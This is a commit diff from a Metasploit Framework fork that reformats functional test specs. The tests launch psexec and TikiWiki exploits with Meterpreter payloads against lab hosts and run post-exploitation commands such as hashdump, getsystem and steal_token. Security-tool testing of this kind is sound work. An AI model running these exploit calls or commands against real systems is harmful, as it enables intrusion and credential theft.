dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Run rubocop --fix-layout test

This commit is contained in:
adfoster-r7 2022-04-28 15:06:43 +01:00
parent bf00619717
commit 29cc349649
No known key found for this signature in database
GPG Key ID: 3BD4FA3818818F04
52 changed files with 1368 additions and 1440 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

336
test/functional/framework/msfconsole_spec.rb
View File

@ -7,27 +7,85 @@ require 'fileutils'
require 'msf_matchers' require 'msf_matchers'
require 'msf_test_case' require 'msf_test_case'
module MsfTest module MsfTest
include MsfTest::MsfMatchers
include MsfTest::MsfMatchers ## This spec exists to help us describe the behavior of msfconsole - TODO
describe "Msfconsole" do
###
# Setup!
###
## This spec exists to help us describe the behavior of msfconsole - TODO before :all do
@working_directory = File.dirname(__FILE__)
## Static specs will make use of RC files here
@static_resource_directory = "#{@working_directory}/msftest/resource"
## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc"
## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output"
## Create a framework object
@framework = ::Msf::Simple::Framework.create
end
before :each do
end
after :each do
end
after :all do
## Clean up
# FileUtils.rm_rf(@temp_directory)
end
###
# Static Test cases!
###
it "should start and let us run help" do
data = start_console_and_run_rc("help", "#{@static_resource_directory}/help.rc")
success_strings = [
'help',
'Database Backend Commands',
'Core Commands'
]
failure_strings = [] | generic_failure_strings
failure_exception_strings = [] | generic_failure_exception_strings
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
end
it "should generate a meterpreter session against a vulnerable win32 host" do
## Set input & output to something sane
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::File.new("temp.output")
session = generate_x86_meterpreter_session(input, output)
session.should_not be_nil
if session
session.load_stdapi
session.run_cmd("help")
else
flunk "Error interacting with session"
end
end
###
# Dynamic Test Cases!!
###
describe "Msfconsole" do
###
# Setup!
###
before :all do
@working_directory = File.dirname(__FILE__) @working_directory = File.dirname(__FILE__)
## Static specs will make use of RC files here
@static_resource_directory = "#{@working_directory}/msftest/resource"
## Directories for the generated specs ## Directories for the generated specs
@temp_directory = "#{@working_directory}/msfconsole_specs" @temp_directory = "#{@working_directory}/msfconsole_specs"
@temp_input_directory = "#{@temp_directory}/generated_rc" @temp_input_directory = "#{@temp_directory}/generated_rc"
@ -35,176 +93,112 @@ describe "Msfconsole" do
## Where all output from the runs will go ## Where all output from the runs will go
@temp_output_directory = "#{@temp_directory}/output" @temp_output_directory = "#{@temp_directory}/output"
## Create a framework object if File.directory? @temp_directory
@framework = ::Msf::Simple::Framework.create FileUtils.rm_rf(@temp_directory)
end
before :each do
end
after :each do
end
after :all do
## Clean up
#FileUtils.rm_rf(@temp_directory)
end
###
# Static Test cases!
###
it "should start and let us run help" do
data = start_console_and_run_rc("help","#{@static_resource_directory}/help.rc")
success_strings = [ 'help',
'Database Backend Commands',
'Core Commands' ]
failure_strings = [] | generic_failure_strings
failure_exception_strings = [] | generic_failure_exception_strings
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
end
it "should generate a meterpreter session against a vulnerable win32 host" do
## Set input & output to something sane
input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::File.new("temp.output")
session = generate_x86_meterpreter_session(input, output)
session.should_not be_nil
if session
session.load_stdapi
session.run_cmd("help")
else
flunk "Error interacting with session"
end end
end
###
# Dynamic Test Cases!!
###
@working_directory = File.dirname(__FILE__) Dir.mkdir(@temp_directory)
Dir.mkdir(@temp_input_directory)
Dir.mkdir(@temp_output_directory)
## Directories for the generated specs Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
@temp_directory = "#{@working_directory}/msfconsole_specs" ## Parse this test case
@temp_input_directory = "#{@temp_directory}/generated_rc" test_case = MsfTestCase.new(filename)
puts "Found #{test_case.name} in: #{filename}"
## Where all output from the runs will go ## Write the commands back to a temporary RC file
@temp_output_directory = "#{@temp_directory}/output" puts "Writing #{@temp_input_directory}/#{test_case.name}.rc"
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands }
if File.directory? @temp_directory ## Create the rspec Test Case
FileUtils.rm_rf(@temp_directory) it "should #{test_case.name}" do
end ## Gather the success / failure strings, and combine with the generics
success_strings = test_case.expected_successes
failure_strings = test_case.expected_failures | generic_failure_strings
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
Dir.mkdir(@temp_directory) ## run the commands
Dir.mkdir(@temp_input_directory) data = start_console_and_run_rc(test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
Dir.mkdir(@temp_output_directory)
Dir.glob("#{@working_directory}/msftest/*.msftest").each do |filename|
## Parse this test case
test_case = MsfTestCase.new(filename)
puts "Found #{test_case.name} in: #{filename}"
## Write the commands back to a temporary RC file ## check the output
puts "Writing #{@temp_input_directory}/#{test_case.name}.rc" data.should contain_all_successes(success_strings)
File.open("#{@temp_input_directory}/#{test_case.name}.rc", 'w') { |f| f.puts test_case.commands } data.should contain_no_failures_except(failure_strings, failure_exception_strings)
## Create the rspec Test Case ## Clean up
it "should #{test_case.name}" do # File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
# File.delete("#{@temp_output_directory}/#{test_case.name}")
## Gather the success / failure strings, and combine with the generics end
success_strings = test_case.expected_successes
failure_strings = test_case.expected_failures | generic_failure_strings
failure_exception_strings = test_case.expected_failure_exceptions | generic_failure_exception_strings
## run the commands
data = start_console_and_run_rc( test_case.name, "#{@temp_input_directory}/#{test_case.name}.rc")
## check the output
data.should contain_all_successes(success_strings)
data.should contain_no_failures_except(failure_strings, failure_exception_strings)
## Clean up
#File.delete("#{@temp_input_directory}/#{test_case.name}.rc")
#File.delete("#{@temp_output_directory}/#{test_case.name}")
end end
end
### ###
# Test case helpers: # Test case helpers:
### ###
def generic_success_strings def generic_success_strings
[] []
end
def generic_failure_strings
['fatal', 'fail', 'error', 'exception']
end
def generic_failure_exception_strings
[]
end
def start_console_and_run_rc(name,rc_file, database_file=false)
output_file = "#{@temp_output_directory}/#{name}"
if database_file
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
else
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
end end
system("#{msfconsole_string}")
data = hlp_file_to_string("#{output_file}") def generic_failure_strings
end ['fatal', 'fail', 'error', 'exception']
def generate_x86_meterpreter_session(input, output)
## Setup for win32
exploit_name = 'windows/smb/psexec'
payload_name = 'windows/meterpreter/bind_tcp'
## Fire it off against a known-vulnerable host
session = @framework.exploits.create(exploit_name).exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
'Payload' => payload_name,
'LocalInput' => input,
'LocalOutput' => output)
## If a session came back, try to interact with it.
if session
return session
else
return nil
end end
end
def generate_win64_meterpreter_session(input, output) def generic_failure_exception_strings
raise "Not Implemented" []
end end
def start_console_and_run_rc(name, rc_file, database_file = false)
def generate_java_meterpreter_session(input, output) output_file = "#{@temp_output_directory}/#{name}"
raise "Not Implemented"
end if database_file
msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file} -y #{database_file}"
def generate_php_meterpreter_session(input, output) else
raise "Not Implemented" msfconsole_string = "ruby #{@working_directory}/../../../msfconsole -o #{output_file} -r #{rc_file}"
end end
def hlp_file_to_string(filename) system("#{msfconsole_string}")
data = ""
f = File.open(filename, "r") data = hlp_file_to_string("#{output_file}")
f.each_line do |line| end
data += line
def generate_x86_meterpreter_session(input, output)
## Setup for win32
exploit_name = 'windows/smb/psexec'
payload_name = 'windows/meterpreter/bind_tcp'
## Fire it off against a known-vulnerable host
session = @framework.exploits.create(exploit_name).exploit_simple(
'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
'Payload' => payload_name,
'LocalInput' => input,
'LocalOutput' => output
)
## If a session came back, try to interact with it.
if session
return session
else
return nil
end
end
def generate_win64_meterpreter_session(input, output)
raise "Not Implemented"
end
def generate_java_meterpreter_session(input, output)
raise "Not Implemented"
end
def generate_php_meterpreter_session(input, output)
raise "Not Implemented"
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end end
return data
end end
end end
end

22
test/functional/meterpreter/java_meterpreter_specs.rb
View File

@ -1,19 +1,15 @@
module MsfTest module MsfTest
module JavaMeterpreterSpecs module JavaMeterpreterSpecs
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
## This file is intended to be used in conjunction with a harness, def self.included(base)
## such as meterpreter_win32_spec.rb base.class_eval do
it "should not error when taking a screenshot" do
def self.included(base) success_strings = [ 'Screenshot saved to' ]
base.class_eval do hlp_run_command_check_output("screenshot", "screenshot", success_strings)
end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end end
end end
end end
end
end end

129
test/functional/meterpreter/meterpreter_java_spec.rb
View File

@ -7,85 +7,80 @@ require 'meterpreter_spec_helper'
require 'meterpreter_specs' require 'meterpreter_specs'
module MsfTest module MsfTest
describe "JavaMeterpreter" do
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
describe "JavaMeterpreter" do # This include brings in all the specs that are generic across the
# meterpreter platforms
# This include brings in all the spec helper methods include MsfTest::MeterpreterSpecs
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the java
# meterpreter
include MsfTest::JavaMeterpreterSpecs
before :all do # This include brings in all the specs that are specific to the java
@verbose = true # meterpreter
include MsfTest::JavaMeterpreterSpecs
@meterpreter_type = "java"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory before :all do
@verbose = true
@meterpreter_type = "java"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_java
end
before :each do
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
# FileUtils.rm_rf("*.jpeg")
# FileUtils.rm_rf("payload.jar")
FileUtils.rm_rf(@output_directory) FileUtils.rm_rf(@output_directory)
end end
Dir.mkdir(@output_directory) def create_session_java
@default_file = "#{@output_directory}/default" ## Setup for win32
@framework = Msf::Simple::Framework.create
create_session_java test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules')
end @framework.modules.add_module_path(test_modules_path)
before :each do @exploit_name = 'test/java_tester'
@payload_name = 'java/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
end # Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
after :each do ## Fire it off against a known-vulnerable host
@session.init_ui(@input, @output) @session = exploit.exploit_simple(
end 'Options' => {},
'Payload' => @payload_name,
after :all do 'LocalInput' => @input,
#FileUtils.rm_rf("*.jpeg") 'LocalOutput' => @output
#FileUtils.rm_rf("payload.jar") )
FileUtils.rm_rf(@output_directory)
end
puts @session.inspect
def create_session_java
## Setup for win32 ## If a session came back, try to interact with it.
@framework = Msf::Simple::Framework.create if @session
@session.load_stdapi
test_modules_path = File.join(File.dirname(__FILE__), '..', '..', 'modules') else
@framework.modules.add_module_path(test_modules_path) raise Exception "Couldn't get a session!"
end
@exploit_name = 'test/java_tester'
@payload_name = 'java/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
puts @session.inspect
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end end
end end
end
end end

113
test/functional/meterpreter/meterpreter_php_spec.rb
View File

@ -7,76 +7,71 @@ require 'meterpreter_spec_helper'
require 'meterpreter_specs' require 'meterpreter_specs'
module MsfTest module MsfTest
describe "PhpMeterpreter" do
# This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
describe "PhpMeterpreter" do # This include brings in all the specs that are generic across the
# meterpreter platforms
# This include brings in all the spec helper methods include MsfTest::MeterpreterSpecs
include MsfTest::MeterpreterSpecHelper
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
before :all do before :all do
@verbose = true @verbose = true
@meterpreter_type = "php"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory @meterpreter_type = "php"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_php
end
before :each do
end
after :each do
@session.init_ui(@input, @output)
end
after :all do
FileUtils.rm_rf(@output_directory) FileUtils.rm_rf(@output_directory)
end end
Dir.mkdir(@output_directory) def create_session_php
@default_file = "#{@output_directory}/default" ## Setup for php
@framework = Msf::Simple::Framework.create
create_session_php @exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
end @payload_name = 'php/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
before :each do # Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
end ## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => { 'RHOST' => "metasploitable" },
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output
)
after :each do puts @session.inspect
@session.init_ui(@input, @output)
end
after :all do
FileUtils.rm_rf(@output_directory)
end
## If a session came back, try to interact with it.
def create_session_php if @session
@session.load_stdapi
## Setup for php else
@framework = Msf::Simple::Framework.create raise Exception "Couldn't get a session!"
end
@exploit_name = 'unix/webapp/tikiwiki_graph_formula_exec'
@payload_name = 'php/meterpreter/bind_tcp'
@input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple(
'Options' => {'RHOST' => "metasploitable"},
'Payload' => @payload_name,
'LocalInput' => @input,
'LocalOutput' => @output)
puts @session.inspect
## If a session came back, try to interact with it.
if @session
@session.load_stdapi
else
raise Exception "Couldn't get a session!"
end end
end end
end
end end

97
test/functional/meterpreter/meterpreter_spec_helper.rb
View File

@ -1,58 +1,55 @@
module MsfTest module MsfTest
module MeterpreterSpecHelper module MeterpreterSpecHelper
def self.included(base)
def self.included(base) base.class_eval do
base.class_eval do def generic_failure_strings
['fail', 'error', 'exception']
def generic_failure_strings
['fail', 'error', 'exception']
end
def generic_failure_exception_strings
['nserror.dll', 'tiki-error.php','tiki-error_simple.php','tiki-rss_error.php'] ##ugh, this is dependent on the target
end
def hlp_run_command_check_output(name,command,success_strings=[],fail_strings=[], fail_exception_strings=[])
fail_strings = fail_strings | generic_failure_strings
fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
temp_command_file = "#{@output_directory}/#{name}"
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
@session.init_ui(@input, command_output)
command_output.print_line("meterpreter_functional_test_start")
if @verbose
puts "Running Command: " + command
end end
@session.run_cmd(command) def generic_failure_exception_strings
command_output.print_line("meterpreter_functional_test_end") ['nserror.dll', 'tiki-error.php', 'tiki-error_simple.php', 'tiki-rss_error.php'] # #ugh, this is dependent on the target
data = hlp_file_to_string(temp_command_file)
data.should contain_a_complete_test
data.should contain_all_successes
data.should contain_no_failures_except
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end end
return data
end def hlp_run_command_check_output(name, command, success_strings = [], fail_strings = [], fail_exception_strings = [])
fail_strings = fail_strings | generic_failure_strings
def hlp_string_to_file(string, filepath) fail_exception_strings = fail_exception_strings | generic_failure_exception_strings
# Create a new file and write to it
File.open(filepath, 'w') do |f2| temp_command_file = "#{@output_directory}/#{name}"
command_output = Rex::Ui::Text::Output::File.new(temp_command_file)
@session.init_ui(@input, command_output)
command_output.print_line("meterpreter_functional_test_start")
if @verbose
puts "Running Command: " + command
end
@session.run_cmd(command)
command_output.print_line("meterpreter_functional_test_end")
data = hlp_file_to_string(temp_command_file)
data.should contain_a_complete_test
data.should contain_all_successes
data.should contain_no_failures_except
end
def hlp_file_to_string(filename)
data = ""
f = File.open(filename, "r")
f.each_line do |line|
data += line
end
return data
end
def hlp_string_to_file(string, filepath)
# Create a new file and write to it
File.open(filepath, 'w') do |f2|
f2.puts string f2.puts string
end end
end
end end
end end
end end
end end
end

89
test/functional/meterpreter/meterpreter_specs.rb
View File

@ -1,11 +1,10 @@
module MsfTest module MsfTest
module MeterpreterSpecs module MeterpreterSpecs
def self.included(base)
def self.included(base) base.class_eval do
base.class_eval do it "should not error when running each command" do
commands = [
it "should not error when running each command" do "?",
commands = [ "?",
"background", "background",
"bgkill", "bgkill",
"bglist", "bglist",
@ -15,9 +14,9 @@ module MeterpreterSpecs
"exit", "exit",
"help", "help",
"interact", "interact",
#"irb", # "irb",
"migrate", "migrate",
#"quit", # "quit",
"read", "read",
"run", "run",
"use", "use",
@ -27,7 +26,7 @@ module MeterpreterSpecs
"cd", "cd",
"del", "del",
"download", "download",
#"edit", # "edit",
"getlwd", "getlwd",
"getwd", "getwd",
"lcd", "lcd",
@ -50,11 +49,11 @@ module MeterpreterSpecs
"getuid", "getuid",
"kill", "kill",
"ps", "ps",
#"reboot", # "reboot",
"reg", "reg",
"rev2self", "rev2self",
#"shell", # "shell",
#"shutdown", # "shutdown",
"steal_token", "steal_token",
"sysinfo", "sysinfo",
"enumdesktops", "enumdesktops",
@ -69,41 +68,43 @@ module MeterpreterSpecs
"getsystem", "getsystem",
"hashdump", "hashdump",
"timestomp" "timestomp"
] ]
## Run each command, check for execeptions ## Run each command, check for execeptions
commands.each do |command| commands.each do |command|
hlp_run_command_check_output("basic_#{command}",command) hlp_run_command_check_output("basic_#{command}", command)
end
end end
end
it "should not error when running help" do it "should not error when running help" do
success_strings = [ 'Core Commands', success_strings = [
'Stdapi: File system Commands', 'Core Commands',
'Stdapi: Networking Commands', 'Stdapi: File system Commands',
'Stdapi: System Commands', 'Stdapi: Networking Commands',
'Stdapi: User interface Commands'] 'Stdapi: System Commands',
'Stdapi: User interface Commands'
hlp_run_command_check_output("help","help", success_strings) ]
hlp_run_command_check_output("help", "help", success_strings)
end
it "should not error when running the help shortcut" do
success_strings = [
'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands'
]
hlp_run_command_check_output("help_shortcut", "?", success_strings)
end
it "should not error when checking for background channels" do
success_strings = [ 'No active channels.' ]
hlp_run_command_check_output("channel_list_empty", "channel -l", success_strings)
end
end end
it "should not error when running the help shortcut" do
success_strings = [ 'Core Commands',
'Stdapi: File system Commands',
'Stdapi: Networking Commands',
'Stdapi: System Commands',
'Stdapi: User interface Commands' ]
hlp_run_command_check_output("help_shortcut","?", success_strings)
end
it "should not error when checking for background channels" do
success_strings = [ 'No active channels.' ]
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
end
end end
end end
end
end end

135
test/functional/meterpreter/meterpreter_win32_spec.rb
View File

@ -10,94 +10,87 @@ require 'meterpreter_specs'
require 'windows_meterpreter_specs' require 'windows_meterpreter_specs'
module MsfTest module MsfTest
describe "Win32Meterpreter" do
# Include Custom Matchers
include MsfTest::MsfMatchers
describe "Win32Meterpreter" do # This include brings in all the spec helper methods
include MsfTest::MeterpreterSpecHelper
# Include Custom Matchers # This include brings in all the specs that are generic across the
include MsfTest::MsfMatchers # meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the
# This include brings in all the spec helper methods # windows meterpreter platforms
include MsfTest::MeterpreterSpecHelper include MsfTest::WindowsMeterpreterSpecs
# This include brings in all the specs that are generic across the
# meterpreter platforms
include MsfTest::MeterpreterSpecs
# This include brings in all the specs that are specific to the before :all do
# windows meterpreter platforms @verbose = true
include MsfTest::WindowsMeterpreterSpecs
before :all do @meterpreter_type = "win32"
@verbose = true
@meterpreter_type = "win32"
## Set up an outupt directory
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory ## Set up an outupt directory
FileUtils.rm_rf(@output_directory) @output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
if File.directory? @output_directory
FileUtils.rm_rf(@output_directory)
end
Dir.mkdir(@output_directory)
@default_file = "#{@output_directory}/default"
create_session_windows_x32
end end
Dir.mkdir(@output_directory) before :each do
@default_file = "#{@output_directory}/default" end
create_session_windows_x32 after :each do
end @session.init_ui(@input, @output)
end
before :each do after :all do
## Clean up test output
FileUtils.rm_rf(@output_directory)
end ## Screenshot command leaves .jpegs :(
## TODO - fix the meterpreter command to write to
after :each do ## TODO - an arbitrary file.
@session.init_ui(@input, @output) Dir.new(File.dirname(__FILE__)).each do |file|
end if file =~ /.jpeg/
File.delete(file)
after :all do end
## Clean up test output
FileUtils.rm_rf(@output_directory)
## Screenshot command leaves .jpegs :(
## TODO - fix the meterpreter command to write to
## TODO - an arbitrary file.
Dir.new(File.dirname(__FILE__)).each do |file|
if file =~ /.jpeg/
File.delete(file)
end end
end end
end
def create_session_windows_x32
## Setup for win32 def create_session_windows_x32
@framework = Msf::Simple::Framework.create ## Setup for win32
@exploit_name = 'windows/smb/psexec' @framework = Msf::Simple::Framework.create
@payload_name = 'windows/meterpreter/bind_tcp' @exploit_name = 'windows/smb/psexec'
@input = Rex::Ui::Text::Input::Stdio.new @payload_name = 'windows/meterpreter/bind_tcp'
@output = Rex::Ui::Text::Output::File.new(@default_file) @input = Rex::Ui::Text::Input::Stdio.new
@output = Rex::Ui::Text::Output::File.new(@default_file)
# Initialize the exploit instance # Initialize the exploit instance
exploit = @framework.exploits.create(@exploit_name) exploit = @framework.exploits.create(@exploit_name)
## Fire it off against a known-vulnerable host ## Fire it off against a known-vulnerable host
@session = exploit.exploit_simple( @session = exploit.exploit_simple(
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""}, 'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
'Payload' => @payload_name, 'Payload' => @payload_name,
'LocalInput' => @input, 'LocalInput' => @input,
'LocalOutput' => @output) 'LocalOutput' => @output
)
## If a session came back, try to interact with it. ## If a session came back, try to interact with it.
if @session if @session
puts "got a session" puts "got a session"
@session.load_stdapi @session.load_stdapi
else else
puts "unable to get session" puts "unable to get session"
#flunk "Couldn't get a session!" # flunk "Couldn't get a session!"
end
end end
end end
end
end end

67
test/functional/meterpreter/windows_meterpreter_specs.rb
View File

@ -1,49 +1,46 @@
module MsfTest module MsfTest
module WindowsMeterpreterSpecs module WindowsMeterpreterSpecs
## This file is intended to be used in conjunction with a harness,
## such as meterpreter_win32_spec.rb
## This file is intended to be used in conjunction with a harness, def self.included(base)
## such as meterpreter_win32_spec.rb base.class_eval do
it "should not error when uploading a file to a windows box" do
upload_success_strings = [
'uploading',
'uploaded'
]
def self.included(base) ## create a file to upload
base.class_eval do filename = "/tmp/whatever"
if File.exist?(filename)
FileUtils.rm(filename)
end
hlp_string_to_file("owned!", filename)
it "should not error when uploading a file to a windows box" do ## run the upload / quit commands
upload_success_strings = [ 'uploading', hlp_run_command_check_output("upload", "upload #{filename} C:\\", upload_success_strings)
'uploaded' ] # hlp_run_command_check_output("quit","quit")
## create a file to upload ## clean up
filename = "/tmp/whatever"
if File.exist?(filename)
FileUtils.rm(filename) FileUtils.rm(filename)
end end
hlp_string_to_file("owned!", filename)
## run the upload / quit commands it "should show the priv commands when running help" do
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings) success_strings = [
#hlp_run_command_check_output("quit","quit") 'Priv: Elevate Commands',
'Priv: Password database Commands',
'Priv: Timestomp Commands'
]
## clean up hlp_run_command_check_output("help_shortcut", "help", success_strings)
FileUtils.rm(filename) end
end
it "should show the priv commands when running help" do
success_strings = ['Priv: Elevate Commands',
'Priv: Password database Commands',
'Priv: Timestomp Commands' ]
hlp_run_command_check_output("help_shortcut","help", success_strings)
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot", "screenshot", success_strings)
end
end end
it "should not error when taking a screenshot" do
success_strings = [ 'Screenshot saved to' ]
hlp_run_command_check_output("screenshot","screenshot", success_strings)
end
end end
end end
end
end end

2
test/hooks/array_to_s.rb
View File

@ -1,7 +1,7 @@
class Array class Array
@@to_s_reported = {} @@to_s_reported = {}
def to_s(*args) def to_s(*args)
if(not @@to_s_reported[caller[0].to_s]) if (not @@to_s_reported[caller[0].to_s])
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}" $stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
@@to_s_reported[caller[0].to_s] = true @@to_s_reported[caller[0].to_s] = true
end end

1
test/hooks/string_idx.rb
View File

@ -1,7 +1,6 @@
class String class String
@@idx_reported = {} @@idx_reported = {}
def [](*args) def [](*args)
if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s] if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s]
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n" $stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
@@idx_reported[caller[0].to_s] = true @@idx_reported[caller[0].to_s] = true

99
test/lib/module_test.rb
View File

@ -1,68 +1,63 @@
module Msf module Msf
module ModuleTest
attr_accessor :tests
attr_accessor :failures
module ModuleTest def initialize(info = {})
attr_accessor :tests @tests = 0
attr_accessor :failures @failures = 0
super
end
def initialize(info={}) def run_all_tests
@tests = 0 tests = self.methods.select { |m| m.to_s =~ /^test_/ }
@failures = 0 tests.each { |test_method|
super self.send(test_method)
end }
end
def run_all_tests def it(msg = "", &block)
tests = self.methods.select { |m| m.to_s =~ /^test_/ } @tests += 1
tests.each { |test_method| begin
self.send(test_method) result = block.call
} unless result
print_error("FAILED: #{msg}")
end print_error("FAILED: #{error}") if error
@failures += 1
def it(msg="", &block) return
@tests += 1 end
begin rescue ::Exception => e
result = block.call
unless result
print_error("FAILED: #{msg}") print_error("FAILED: #{msg}")
print_error("FAILED: #{error}") if error print_error("Exception: #{e.class} : #{e}")
@failures += 1 dlog("Exception in testing - #{msg}")
dlog("Call stack: #{e.backtrace.join("\n")}")
return return
end end
rescue ::Exception => e
print_error("FAILED: #{msg}") print_good("#{msg}")
print_error("Exception: #{e.class} : #{e}")
dlog("Exception in testing - #{msg}")
dlog("Call stack: #{e.backtrace.join("\n")}")
return
end end
print_good("#{msg}") def pending(msg = "", &block)
print_status("PENDING: #{msg}")
end
end end
def pending(msg="", &block) module ModuleTest::PostTest
print_status("PENDING: #{msg}") include ModuleTest
end def run
end print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type} and platform is #{session.platform}")
module ModuleTest::PostTest t = Time.now
include ModuleTest @tests = 0; @failures = 0
def run run_all_tests
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type} and platform is #{session.platform}")
t = Time.now vprint_status("Testing complete in #{Time.now - t}")
@tests = 0; @failures = 0 if (@failures > 0)
run_all_tests print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
else
vprint_status("Testing complete in #{Time.now - t}") print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
if (@failures > 0) end
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
else
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
end end
end end
end end
end

152
test/lib/msf_matchers.rb
View File

@ -2,93 +2,91 @@ $:.unshift(File.join((File.dirname(__FILE__))))
require 'regexr' require 'regexr'
module MsfTest module MsfTest
module MsfMatchers
class ContainACompleteTest
module MsfMatchers def initialize()
@r = Regexr.new(true)
end
class ContainACompleteTest def matches?(data)
@data = data
return @r.verify_start_and_end(@data, "meterpreter_functional_test_start", "meterpreter_functional_test_end")
end
def failure_message
"Beginning or end was incorrect."
end
def negative_failure_message
"Expected to find a no beginning or end, but it matched."
end
def initialize()
@r = Regexr.new(true)
end end
def matches?(data) def contain_a_complete_test
@data = data ContainACompleteTest.new
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
end end
def failure_message class ContainAllSuccesses
"Beginning or end was incorrect."
def initialize(successes = [])
@successes = successes
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_dont_exist_in_data(@data, @successes)
return true if !@string
nil
end
def failure_message
"expected all successes, but didn't find '#{@string}'"
end
def negative_failure_message
"expected to miss successes but found'm all :("
end
# alias :have_all_successes :contain_all_successes
end end
def negative_failure_message def contain_all_successes(successes = [])
"Expected to find a no beginning or end, but it matched." ContainAllSuccesses.new(successes)
end end
class ContainNoFailuresExcept
def initialize(failures = [], exceptions = [])
@failures = failures
@exceptions = exceptions
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_exist_in_data_except(@data, @failures, @exceptions)
